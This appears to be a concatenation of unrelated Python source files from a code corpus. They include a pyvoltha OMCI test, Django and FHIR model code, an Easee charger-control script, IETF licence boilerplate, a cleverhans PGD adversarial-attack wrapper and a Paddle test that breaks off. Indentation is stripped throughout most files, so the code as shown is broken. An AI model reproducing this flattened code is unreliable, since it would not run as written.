from .mock.mock_onu import MockOnu
from pyvoltha.adapters.extensions.omci.openomci_agent import OpenOMCIAgent, OpenOmciAgentDefaults
from pyvoltha.adapters.extensions.omci.onu_configuration import OMCCVersion
from pyvoltha.adapters.extensions.omci.omci_defs import *
from pyvoltha.adapters.extensions.omci.omci_entities import OntG, Ont2G, Cardholder, \
CircuitPack, SoftwareImage, AniG, UniG
from pyvoltha.common.utils.asleep import asleep
from pyvoltha.adapters.extensions.omci.database.mib_db_dict import MibDbVolatileDict
from datetime import datetime
DEFAULT_OLT_DEVICE_ID = 'default_olt_mock'
DEFAULT_ONU_DEVICE_ID = 'default_onu_mock'
DEFAULT_PON_ID = 0
DEFAULT_ONU_ID = 0
DEFAULT_ONU_SN = 'TEST00000001'
OP = EntityOperations
RC = ReasonCodes
class TestOmciConfiguration(TestCase):
"""
Test the OMCI read-only Configuration library methods
"""
def setUp(self):
self.adapter_agent = MockAdapterAgent()
custom = deepcopy(OpenOmciAgentDefaults)
custom['mib-synchronizer']['database'] = MibDbVolatileDict
self.omci_agent = OpenOMCIAgent(MockCore, support_classes=custom)
self.omci_agent.start()
def tearDown(self):
if self.omci_agent is not None:
self.omci_agent.stop()
if self.adapter_agent is not None:
self.adapter_agent.tearDown()
def setup_mock_olt(self, device_id=DEFAULT_OLT_DEVICE_ID):
handler = MockOltHandler(self.adapter_agent, device_id)
self.adapter_agent.add_device(handler.device)
return handler
def setup_mock_onu(self, parent_id=DEFAULT_OLT_DEVICE_ID,
device_id=DEFAULT_ONU_DEVICE_ID,
pon_id=DEFAULT_PON_ID,
onu_id=DEFAULT_ONU_ID,
serial_no=DEFAULT_ONU_SN):
handler = MockOnuHandler(self.adapter_agent, parent_id, device_id, pon_id, onu_id)
handler.serial_number = serial_no
onu = MockOnu(serial_no, self.adapter_agent, handler.device_id) \
if serial_no is not None else None
handler.onu_mock = onu
return handler
def setup_one_of_each(self):
# Most tests will use at least one OLT and one ONU
self.olt_handler = self.setup_mock_olt()
self.onu_handler = self.setup_mock_onu(parent_id=self.olt_handler.device_id)
self.onu_device = self.onu_handler.onu_mock
self.adapter_agent.add_child_device(self.olt_handler.device,
self.onu_handler.device)
# Add device to OpenOMCI
self.onu_device = self.omci_agent.add_device(DEFAULT_ONU_DEVICE_ID,
self.adapter_agent)
# Allow timeout trigger support while in disabled state for mib sync
# to make tests run cleanly while profiling.
self.onu_device.mib_synchronizer.machine.add_transition('timeout', 'disabled', 'disabled')
def not_called(self, _reason):
assert False, 'Should never be called'
def _stuff_database(self, entries):
"""
Stuff the MIB database with some entries that we will use during tests
"""
database = self.onu_device.mib_synchronizer._database
# Stuff a value into last in sync. This makes it look like
# the ONU has been in-sync at least once.
self.onu_device.mib_synchronizer.last_mib_db_sync = datetime.utcnow()
# Entry is a tuple of (class_id, instance_id, {attributes})
for entry in entries:
database.set(DEFAULT_ONU_DEVICE_ID, entry[0], entry[1], entry[2])
def test_OMCCVersion(self):
for key, value in OMCCVersion.__members__.items():
self.assertEqual(OMCCVersion.to_enum(OMCCVersion[key].value), value)
self.assertEqual(OMCCVersion.to_enum(-1), OMCCVersion.Unknown)
@deferred(timeout=50000)
def test_defaults(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
@raises(AssertionError)
def do_my_tests(_results):
config = self.onu_device.configuration
# Should raise an assertion if it has never been synchronized
config.version
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs. This is a waiting
# Async task from when the OpenOMCIAgent was started. But also start the
# device so that its queued async state machines can run as well
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_but_empty(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
def stuff_db(_results):
self._stuff_database([])
def do_my_tests(_results):
config = self.onu_device.configuration
# If no Class ID exists for a requested property, None should
# be returned
self.assertIsNone(config.version)
self.assertIsNone(config.traffic_management_option)
self.assertIsNone(config.onu_survival_time)
self.assertIsNone(config.equipment_id)
self.assertIsNone(config.omcc_version)
self.assertIsNone(config.vendor_product_code)
self.assertIsNone(config.total_priority_queues)
self.assertIsNone(config.total_traffic_schedulers)
self.assertIsNone(config.total_gem_ports)
self.assertIsNone(config.uptime)
self.assertIsNone(config.connectivity_capability)
self.assertIsNone(config.qos_configuration_flexibility)
self.assertIsNone(config.priority_queue_scale_factor)
self.assertIsNone(config.cardholder_entities)
self.assertIsNone(config.circuitpack_entities)
self.assertIsNone(config.software_images)
self.assertIsNone(config.ani_g_entities)
self.assertIsNone(config.uni_g_entities)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_ont_g_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
version = 'abcDEF'
tm_opt = 2
onu_survival = 123
def stuff_db(_results):
self._stuff_database([
(OntG.class_id, 0, {'version': version,
'traffic_management_options': tm_opt,
'ont_survival_time': onu_survival
})])
def do_my_tests(_results):
config = self.onu_device.configuration
# The values stuffed into the database should be
# reported back
self.assertEqual(config.version, version)
self.assertEqual(config.traffic_management_option, tm_opt)
self.assertEqual(config.onu_survival_time, onu_survival)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_ont_2g_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
equip_id = 'br-549'
omcc_ver = OMCCVersion.G_988_2012
vend_code = 0x1234
queues = 64
scheds = 8
gem_ports = 24
uptime = 12345
conn_capp = 0x00aa
qos_flex = 0x001b
queue_scale = 1
def stuff_db(_results):
self._stuff_database([
(Ont2G.class_id, 0, {'equipment_id': equip_id,
'omcc_version': omcc_ver.value,
'vendor_product_code': vend_code,
'total_priority_queue_number': queues,
'total_traffic_scheduler_number': scheds,
'total_gem_port_id_number': gem_ports,
'sys_uptime': uptime,
'connectivity_capability': conn_capp,
'qos_configuration_flexibility': qos_flex,
'priority_queue_scale_factor': queue_scale
})])
def do_my_tests(_results):
config = self.onu_device.configuration
self.assertEqual(config.equipment_id, equip_id)
self.assertEqual(config.omcc_version, omcc_ver)
self.assertEqual(config.vendor_product_code, vend_code)
self.assertEqual(config.total_priority_queues, queues)
self.assertEqual(config.total_traffic_schedulers, scheds)
self.assertEqual(config.total_gem_ports, gem_ports)
self.assertEqual(config.uptime, uptime)
self.assertEqual(config.connectivity_capability, conn_capp)
self.assertEqual(config.qos_configuration_flexibility, qos_flex)
self.assertEqual(config.priority_queue_scale_factor, queue_scale)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_cardholder_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
ch_entity = 0x102
unit_type = 255
clie_code = 'abc123'
prot_ptr = 0
def stuff_db(_results):
self._stuff_database([
(Cardholder.class_id, ch_entity, {'actual_plugin_unit_type': unit_type,
'actual_equipment_id': clie_code,
'protection_profile_pointer': prot_ptr,
})])
def do_my_tests(_results):
config = self.onu_device.configuration
cardholder = config.cardholder_entities
self.assertTrue(isinstance(cardholder, dict))
self.assertEqual(len(cardholder), 1)
self.assertEqual(cardholder[ch_entity]['entity-id'], ch_entity)
self.assertEqual(cardholder[ch_entity]['is-single-piece'], ch_entity >= 256)
self.assertEqual(cardholder[ch_entity]['slot-number'], ch_entity & 0xFF)
self.assertEqual(cardholder[ch_entity]['actual-plug-in-type'], unit_type)
self.assertEqual(cardholder[ch_entity]['actual-equipment-id'], clie_code)
self.assertEqual(cardholder[ch_entity]['protection-profile-ptr'], prot_ptr)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_circuitpack_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
cp_entity = 0x100
num_ports = 1
serial_num = 'ABCD01234'
cp_version = '1234ABCD'
vendor_id = 'AB-9876'
tconts = 2
pqueues = 64
sched_count = 8
def stuff_db(_results):
self._stuff_database([
(CircuitPack.class_id, cp_entity, {'number_of_ports': num_ports,
'serial_number': serial_num,
'version': cp_version,
'vendor_id': vendor_id,
'total_tcont_buffer_number': tconts,
'total_priority_queue_number': pqueues,
'total_traffic_scheduler_number': sched_count,
})])
def do_my_tests(_results):
config = self.onu_device.configuration
circuitpack = config.circuitpack_entities
self.assertTrue(isinstance(circuitpack, dict))
self.assertEqual(len(circuitpack), 1)
self.assertEqual(circuitpack[cp_entity]['entity-id'], cp_entity)
self.assertEqual(circuitpack[cp_entity]['number-of-ports'], num_ports)
self.assertEqual(circuitpack[cp_entity]['serial-number'], serial_num)
self.assertEqual(circuitpack[cp_entity]['version'], cp_version)
self.assertEqual(circuitpack[cp_entity]['vendor-id'], vendor_id)
self.assertEqual(circuitpack[cp_entity]['total-tcont-count'], tconts)
self.assertEqual(circuitpack[cp_entity]['total-priority-queue-count'], pqueues)
self.assertEqual(circuitpack[cp_entity]['total-traffic-sched-count'], sched_count)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_software_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
sw_entity = 0x200
sw_version = 'Beta-0.0.2'
sw_hash = md5(b"just_a_test").hexdigest()  # md5() requires bytes on Python 3
prod_code = 'MySoftware'
sw_active = True
sw_committed = True
sw_valid = True
def stuff_db(_results):
self._stuff_database([
(SoftwareImage.class_id, sw_entity, {'version': sw_version,
'is_committed': sw_committed,
'is_active': sw_active,
'is_valid': sw_valid,
'product_code': prod_code,
'image_hash': sw_hash,
})])
def do_my_tests(_results):
config = self.onu_device.configuration
images = config.software_images
self.assertTrue(isinstance(images, list))
self.assertEqual(len(images), 1)
self.assertEqual(images[0].name, 'running-revision' if sw_active else 'candidate-revision')
self.assertEqual(images[0].version, sw_version)
self.assertEqual(images[0].is_active, 1 if sw_active else 0)
self.assertEqual(images[0].is_committed, 1 if sw_committed else 0)
self.assertEqual(images[0].is_valid, 1 if sw_valid else 0)
self.assertEqual(images[0].hash, sw_hash)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_ani_g_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
entity_id = 0x0106
tconts = 4
dba_report = 4
def stuff_db(_results):
self._stuff_database([
(AniG.class_id, entity_id, {'total_tcont_number': tconts,
'piggyback_dba_reporting': dba_report
})
])
def do_my_tests(_results):
config = self.onu_device.configuration
anig = config.ani_g_entities
self.assertTrue(isinstance(anig, dict))
self.assertEqual(len(anig), 1)
self.assertEqual(anig[entity_id]['entity-id'], entity_id)
self.assertEqual(anig[entity_id]['slot-number'], (entity_id >> 8) & 0xff)
self.assertEqual(anig[entity_id]['port-number'], entity_id & 0xff)
self.assertEqual(anig[entity_id]['total-tcont-count'], tconts)
self.assertEqual(anig[entity_id]['piggyback-dba-reporting'], dba_report)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_uni_g_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
entity_id = 0x4321
mgmt_cap = 0
def stuff_db(_results):
self._stuff_database([
(UniG.class_id, entity_id, {'management_capability': mgmt_cap})
])
def do_my_tests(_results):
config = self.onu_device.configuration
unig = config.uni_g_entities
self.assertTrue(isinstance(unig, dict))
self.assertEqual(len(unig), 1)
self.assertEqual(unig[entity_id]['entity-id'], entity_id)
self.assertEqual(unig[entity_id]['management-capability'], mgmt_cap)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
if __name__ == '__main__':
main()
|
py | 1a38b31d17c1b87ccc9a40b241bc648a6e949772 | class SocialContext:
def __init__(self, agentsPresent, theme):
#agents present in the current context
self.agentsPresent = agentsPresent
#collection of the characteristics present in the theme (each one with a name and a weight 0 to 1)
self.theme = theme
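# --- Hedged usage sketch (illustrative assumptions: agents as plain strings,
# and a theme mapping characteristic names to weights in [0, 1]):
if __name__ == "__main__":
    ctx = SocialContext(agentsPresent=["alice", "bob"],
                        theme={"formality": 0.8, "humor": 0.2})
    print(ctx.agentsPresent, ctx.theme)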
|
py | 1a38b34461ea53d141aa52ab2e10e0f2a4136513 | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-09-09 09:40
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import tinymce.models
class Migration(migrations.Migration):
dependencies = [
('test_tinymce', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='TestChildModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', tinymce.models.HTMLField(verbose_name='HTML Child Content')),
('parent', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='test_tinymce.TestModel')),
],
),
]
|
py | 1a38b37253881c1476230796a8c4dd4b39e5a49d | # -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/ContactPoint
Release: STU3
Version: 3.0.2
Revision: 11917
Last updated: 2019-10-24T11:53:00+11:00
"""
from pydantic import Field
from . import element, fhirtypes
class ContactPoint(element.Element):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Details of a Technology mediated contact point (phone, fax, email, etc.).
Details for all kinds of technology mediated contact points for a person or
organization, including telephone, email, etc.
"""
resource_type = Field("ContactPoint", const=True)
period: fhirtypes.PeriodType = Field(
None,
alias="period",
title="Time period when the contact point was/is in use",
description=None,
# if property is element of this resource.
element_property=True,
)
rank: fhirtypes.PositiveInt = Field(
None,
alias="rank",
title="Specify preferred order of use (1 = highest)",
description=(
"Specifies a preferred order in which to use a set of contacts. "
"Contacts are ranked with lower values coming before higher values."
),
# if property is element of this resource.
element_property=True,
)
rank__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_rank", title="Extension field for ``rank``."
)
system: fhirtypes.Code = Field(
None,
alias="system",
title="phone | fax | email | pager | url | sms | other",
description=(
"Telecommunications form for contact point - what communications system"
" is required to make use of the contact."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use them at your own responsibility; read the official FHIR documentation.
enum_values=["phone", "fax", "email", "pager", "url", "sms", "other"],
)
system__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_system", title="Extension field for ``system``."
)
use: fhirtypes.Code = Field(
None,
alias="use",
title="home | work | temp | old | mobile - purpose of this contact point",
description="Identifies the purpose for the contact point.",
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use them at your own responsibility; read the official FHIR documentation.
enum_values=["home", "work", "temp", "old", "mobile"],
)
use__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_use", title="Extension field for ``use``."
)
value: fhirtypes.String = Field(
None,
alias="value",
title="The actual contact point details",
description=(
"The actual contact point details, in a form that is meaningful to the "
"designated communication system (i.e. phone number or email address)."
),
# if property is element of this resource.
element_property=True,
)
value__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_value", title="Extension field for ``value``."
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``ContactPoint`` according specification,
with preserving original sequence order.
"""
return ["id", "extension", "system", "value", "use", "rank", "period"]
|
py | 1a38b492f8cf5894e87509718854277451347c18 | from __future__ import absolute_import, unicode_literals
import datetime
import pytest
from freezegun import freeze_time
from tests.factories.rule import ReferralRuleFactory, TimeRuleFactory
from tests.factories.segment import SegmentFactory
@pytest.mark.django_db
def test_no_segments(client, site):
response = client.get('/')
assert response.status_code == 200
assert client.session['segments'] == []
@pytest.mark.django_db
def test_referral_segment(client, site):
referral_segment = SegmentFactory(name='Referral')
ReferralRuleFactory(
regex_string="test.test",
segment=referral_segment
)
response = client.get('/', **{'HTTP_REFERER': 'test.test'})
assert response.status_code == 200
assert client.session['segments'][0]['encoded_name'] == 'referral'
@pytest.mark.django_db
@freeze_time("10:00:00")
def test_time_and_referral_segment(client, site):
segment = SegmentFactory(name='Both')
TimeRuleFactory(
start_time=datetime.time(8, 0, 0),
end_time=datetime.time(23, 0, 0),
segment=segment
)
ReferralRuleFactory(
regex_string="test.test",
segment=segment
)
response = client.get('/', **{'HTTP_REFERER': 'test.test'})
assert response.status_code == 200
assert client.session['segments'][0]['encoded_name'] == 'both'
@pytest.mark.django_db
@freeze_time("7:00:00")
def test_no_time_but_referral_segment(client, site):
segment = SegmentFactory(name='Not both')
TimeRuleFactory(
start_time=datetime.time(8, 0, 0),
end_time=datetime.time(23, 0, 0),
segment=segment
)
ReferralRuleFactory(
regex_string="test.test",
segment=segment
)
response = client.get('/', **{'HTTP_REFERER': 'test.test'})
assert response.status_code == 200
assert len(client.session['segments']) == 0
@pytest.mark.django_db
@freeze_time("9:00:00")
def test_time_but_no_referral_segment(client, site):
segment = SegmentFactory(name='Not both')
TimeRuleFactory(
start_time=datetime.time(8, 0, 0),
end_time=datetime.time(23, 0, 0),
segment=segment
)
ReferralRuleFactory(
regex_string="test.test",
segment=segment
)
response = client.get('/')
assert response.status_code == 200
assert len(client.session['segments']) == 0
|
py | 1a38b4af70d2ce2ea13b0e2fd71261468133b18d | from pyeasee import Easee
from authentication import easee_user, easee_password
async def set_all_charger_states(should_charge, logging_function):
"""Pause or resume all connected easee chargers. Returns True if the state was changed, False if no change was made."""
# pyeasee most likely automatically refreshes the authentication token
# but we set it up every time just to be safe, and because calling the function via the Telegram thread broke otherwise
easee = Easee(easee_user, easee_password)
chargers = await easee.get_chargers()
for charger in chargers:
state = await charger.get_state()
operating_mode = state["chargerOpMode"]
print(f"Charger: '{charger.name}' - Status: {operating_mode}")
if operating_mode == "CHARGING" and not should_charge:
logging_function(f"Genug Saft gezogen. Wallbox '{charger.name}' wird abgeschaltet.")
await charger.pause()
elif operating_mode == "AWAITING_START" and should_charge:
logging_function(f"Ich gรถnn dir noch n bisschen Strom bei Wallbox '{charger.name}'.")
await charger.resume()
await easee.close() |
py | 1a38b6e97673ba18f661bee21663c70ec7d40b28 | class Mail:
def __init__(self, application, driver_config=None):
self.application = application
self.drivers = {}
self.driver_config = driver_config or {}
self.options = {}
def add_driver(self, name, driver):
self.drivers.update({name: driver})
def set_configuration(self, config):
self.driver_config = config
return self
def get_driver(self, name=None):
if name is None:
return self.drivers[self.driver_config.get("default")]
return self.drivers[name]
def get_config_options(self, driver=None):
if driver is None:
return self.driver_config.get(self.driver_config.get("default"), {})
return self.driver_config.get(driver, {})
def mailable(self, mailable):
self.options = mailable.set_application(self.application).build().get_options()
return self
def send(self, driver=None):
selected_driver = driver or self.options.get("driver", None)
config_options = self.get_config_options(selected_driver)
# if an option has already been defined in a mailable use it
if self.options.get("from"):
config_options.pop("from", None)
self.options.update(config_options)
return self.get_driver(selected_driver).set_options(self.options).send()
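# --- Hedged usage sketch (illustration only; `application`, SmtpDriver and
# WelcomeMailable are stand-ins): any driver object exposing
# set_options(...).send() satisfies the contract used in Mail.send() above.
#
#   mail = Mail(application, driver_config={"default": "smtp",
#                                           "smtp": {"from": "noreply@example.com"}})
#   mail.add_driver("smtp", SmtpDriver())
#   mail.mailable(WelcomeMailable()).send()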
|
py | 1a38b6f3b5e2328521c7db37602e2a35368c5d57 | # 'trust200902',
# 'noModificationTrust200902',
# 'noDerivativesTrust200902',
# 'pre5378Trust200902',
# 'trust200811',
# 'noModificationTrust200811',
# 'noDerivativesTrust200811',
boilerplate_tlp = {
"2.0": {
# From https://trustee.ietf.org/license-info/IETF-TLP-2.htm
"draft": [
"""<t>
This Internet-Draft is submitted in full conformance
with the provisions of BCP 78 and BCP 79.
</t>""",
],
"n/a": [
"""<t>
Copyright (c) {year} IETF Trust and the persons identified as
the document authors. All rights reserved.
</t>""",
"""<t>
This document is subject to BCP 78 and the IETF Trust's Legal
Provisions Relating to IETF Documents in effect on the date of
publication of this document (http://trustee.ietf.org/license-info).
Please review these documents carefully, as they describe your rights
and restrictions with respect to this document.
</t>""",
],
"noModification": [
"""<t>
This document may not be modified, and derivative works of it may
not be created, except to format it for publication as an RFC or
to translate it into languages other than English.
</t>""",
],
"noDerivatives": [
"""<t>
This document may not be modified, and derivative works of it may
not be created, and it may not be published except as an
Internet-Draft.
</t>""",
],
"pre5378": [
"""<t>
This document may contain material from IETF Documents or IETF
Contributions published or made publicly available before November
10, 2008. The person(s) controlling the copyright in some of this
material may not have granted the IETF Trust the right to allow
modifications of such material outside the IETF Standards Process.
Without obtaining an adequate license from the person(s)
controlling the copyright in such materials, this document may not
be modified outside the IETF Standards Process, and derivative
works of it may not be created outside the IETF Standards Process,
except to format it for publication as an RFC or to translate it
into languages other than English.
</t>""",
],
},
"3.0": {
# From https://trustee.ietf.org/license-info/IETF-TLP-3.htm
"draft": [
"""<t>
This Internet-Draft is submitted to IETF in full conformance with
the provisions of BCP 78 and BCP 79.
</t>""",
],
"n/a": [
"""<t>
Copyright (c) {year} IETF Trust and the persons identified as
the document authors. All rights reserved.
</t>""",
"""<t>
This document is subject to BCP 78 and the IETF Trust's Legal
Provisions Relating to IETF Documents
(http://trustee.ietf.org/license-info) in effect on the date of
publication of this document. Please review these documents carefully,
as they describe your rights and restrictions with respect to this
document. Code Components extracted from this document must include
Simplified BSD License text as described in Section 4.e of the Trust
Legal Provisions and are provided without warranty as described in the
BSD License.
</t>""",
],
"noModification": [
"""<t>
This document may not be modified, and derivative works of it may
not be created, except to format it for publication as an RFC or
to translate it into languages other than English.
</t>""",
],
"noDerivatives": [
"""<t>
This document may not be modified, and derivative works of it may
not be created, and it may not be published except as an
Internet-Draft.
</t>""",
],
"pre5378": [
"""<t>
This document may contain material from IETF Documents or IETF
Contributions published or made publicly available before November
10, 2008. The person(s) controlling the copyright in some of this
material may not have granted the IETF Trust the right to allow
modifications of such material outside the IETF Standards Process.
Without obtaining an adequate license from the person(s)
controlling the copyright in such materials, this document may not
be modified outside the IETF Standards Process, and derivative
works of it may not be created outside the IETF Standards Process,
except to format it for publication as an RFC or to translate it
into languages other than English.
</t>""",
],
},
"4.0": {
# From https://trustee.ietf.org/license-info/IETF-TLP-4.htm
"draft": [
"""<t>
This Internet-Draft is submitted in full conformance with the
provisions of BCP 78 and BCP 79.
</t>""",
],
"IETF": [
"""<t>
Copyright (c) {year} IETF Trust and the persons identified as the document
authors. All rights reserved.
</t>""",
"""<t>
This document is subject to BCP 78 and the IETF Trust's Legal
Provisions Relating to IETF Documents
(http://trustee.ietf.org/license-info) in effect on the date of
publication of this document. Please review these documents carefully,
as they describe your rights and restrictions with respect to this
document. Code Components extracted from this document must include
Simplified BSD License text as described in Section 4.e of the Trust
Legal Provisions and are provided without warranty as described in the
Simplified BSD License.
</t>""",
],
"alt": [
"""<t>
Copyright (c) {year} IETF Trust and the persons identified as the
document authors. All rights reserved.
</t>""",
"""<t>
This document is subject to BCP 78 and the IETF Trust's Legal
Provisions Relating to IETF Documents
(http://trustee.ietf.org/license-info) in effect on the date of
publication of this document. Please review these documents
carefully, as they describe your rights and restrictions with
respect to this document.
</t>""",
],
"noModification": [
"""<t>
This document may not be modified, and derivative works of it may
not be created, except to format it for publication as an RFC or
to translate it into languages other than English.
</t>""",
],
"noDerivatives": [
"""<t>
This document may not be modified, and derivative works of it may
not be created, and it may not be published except as an
Internet-Draft.
</t>""",
],
"pre5378": [
"""<t>
This document may contain material from IETF Documents or IETF
Contributions published or made publicly available before November
10, 2008. The person(s) controlling the copyright in some of this
material may not have granted the IETF Trust the right to allow
modifications of such material outside the IETF Standards Process.
Without obtaining an adequate license from the person(s)
controlling the copyright in such materials, this document may not
be modified outside the IETF Standards Process, and derivative
works of it may not be created outside the IETF Standards Process,
except to format it for publication as an RFC or to translate it
into languages other than English.
</t>""",
],
},
"5.0": {
# From https://trustee.ietf.org/license-info/IETF-TLP-5.htm
"draft": [
"""<t>
This Internet-Draft is submitted in full conformance with the
provisions of BCP 78 and BCP 79.
</t>""",
],
"IETF": [
"""<t>
Copyright (c) {year} IETF Trust and the persons identified as the
document authors. All rights reserved.
</t>""",
"""<t>
This document is subject to BCP 78 and the IETF Trust's Legal
Provisions Relating to IETF Documents
(<eref target="{scheme}://trustee.ietf.org/license-info"/>) in effect on the date of
publication of this document. Please review these documents
carefully, as they describe your rights and restrictions with
respect to this document. Code Components extracted from this
document must include Revised BSD License text as described in
Section 4.e of the Trust Legal Provisions and are provided without
warranty as described in the Revised BSD License.
</t>""",
],
"alt": [
"""<t>
Copyright (c) {year} IETF Trust and the persons identified as the
document authors. All rights reserved.
</t>""",
"""<t>
This document is subject to BCP 78 and the IETF Trust's Legal
Provisions Relating to IETF Documents
(<eref target="{scheme}://trustee.ietf.org/license-info"/>) in effect on the date of
publication of this document. Please review these documents
carefully, as they describe your rights and restrictions with
respect to this document.
</t>""",
],
"noModification": [
"""<t>
This document may not be modified, and derivative works of it may
not be created, except to format it for publication as an RFC or
to translate it into languages other than English.
</t>""",
],
"noDerivatives": [
"""<t>
This document may not be modified, and derivative works of it may
not be created, and it may not be published except as an
Internet-Draft.
</t>""",
],
"pre5378": [
"""<t>
This document may contain material from IETF Documents or IETF
Contributions published or made publicly available before November
10, 2008. The person(s) controlling the copyright in some of this
material may not have granted the IETF Trust the right to allow
modifications of such material outside the IETF Standards Process.
Without obtaining an adequate license from the person(s)
controlling the copyright in such materials, this document may not
be modified outside the IETF Standards Process, and derivative
works of it may not be created outside the IETF Standards Process,
except to format it for publication as an RFC or to translate it
into languages other than English.
</t>""",
],
},
}
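# --- Hedged usage sketch (not part of the table): the copyright paragraphs
# carry str.format() placeholders ({year}, plus {scheme} in the TLP 5.0
# entries), so rendering one looks like:
if __name__ == "__main__":
    paragraph = boilerplate_tlp["5.0"]["IETF"][1]
    print(paragraph.format(year=2021, scheme="https"))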
|
py | 1a38b79cb3a9c356dc4bf9ff1a8fcae7157ce7bd | import numpy as np
from cleverhans.attacks import ProjectedGradientDescent
from tools.cleverhans.adversarial_attack import AdversarialAttack
class PGDAttack(AdversarialAttack):
def __init__(self, model, targeted=False, step_size_iter=0.05, max_perturbation=0.3, n_iterations=10,
norm_order=np.inf, rand_init=None, rand_minmax=0.3, clip_min=None, clip_max=None, sanity_checks=True):
super().__init__(model=model, clip_min=clip_min, clip_max=clip_max)
self._targeted = targeted
self._step_size_iter = step_size_iter
self._max_perturbation = max_perturbation
self._n_iterations = n_iterations
self._norm_order = norm_order
self._rand_init = rand_init
self._rand_minmax = rand_minmax
self._sanity_checks = sanity_checks
with self.graph.as_default():
self._method = ProjectedGradientDescent(self._model, sess=self.session, eps=self._max_perturbation,
eps_iter=self._step_size_iter, nb_iter=self._n_iterations,
ord=self._norm_order, rand_init=self._rand_init,
clip_min=self._clip_min, clip_max=self._clip_max,
sanity_checks=self._sanity_checks)
def attack_method(self, labels):
if labels is not None:
if self._targeted:
return self._method.generate(x=self._x_clean, y_target=labels, rand_minmax=self._rand_minmax)
else:
return self._method.generate(x=self._x_clean, y=labels, rand_minmax=self._rand_minmax)
return self._method.generate(x=self._x_clean, rand_minmax=self._rand_minmax)
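# --- Hedged usage sketch (illustration only; `model` stands in for whatever
# cleverhans-compatible wrapper AdversarialAttack expects). Typical L-inf
# settings for images scaled to [0, 1]:
#
#   attack = PGDAttack(model, max_perturbation=8 / 255, step_size_iter=2 / 255,
#                      n_iterations=40, clip_min=0.0, clip_max=1.0)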
|
py | 1a38b79eb90ebc3c9afa31b8fbb78aa0b2a776ee | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import paddle
import os
import warnings
import paddle.utils.cpp_extension.extension_utils as utils
class TestABIBase(unittest.TestCase):
def test_environ(self):
compiler_list = ['gcc', 'cl']
for compiler in compiler_list:
for flag in ['1', 'True', 'true']:
os.environ['PADDLE_SKIP_CHECK_ABI'] = flag
